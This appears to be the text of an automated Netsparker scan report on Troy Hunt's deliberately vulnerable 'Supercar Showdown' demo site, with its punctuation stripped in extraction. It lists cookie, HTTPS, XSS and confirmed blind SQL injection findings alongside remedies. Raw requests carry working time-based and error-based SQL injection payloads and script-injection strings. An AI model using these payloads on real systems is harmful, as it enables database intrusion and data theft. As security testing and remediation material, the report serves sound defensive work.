RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
5 TOTALCRITICAL
CONFIRMED
5
1 Blind SQL InjectionNetsparkeridentifiedablindSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabaseInthesetestsSQLinjectionwasnotobviousbutthedifferentresponsesfromthepagebasedontheinjectiontestallowedustoidentifyandconfirmtheSQLinjection
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocatethealldynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM change alllegacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
11 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
5 57
RequestGET Make1orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230021 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtNissans - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
12 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527-
ParametersParameter Type Value
orderBy GET 1 WAITFOR DELAY 0025--
asc GET false
RequestGET SupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527--ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
6 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
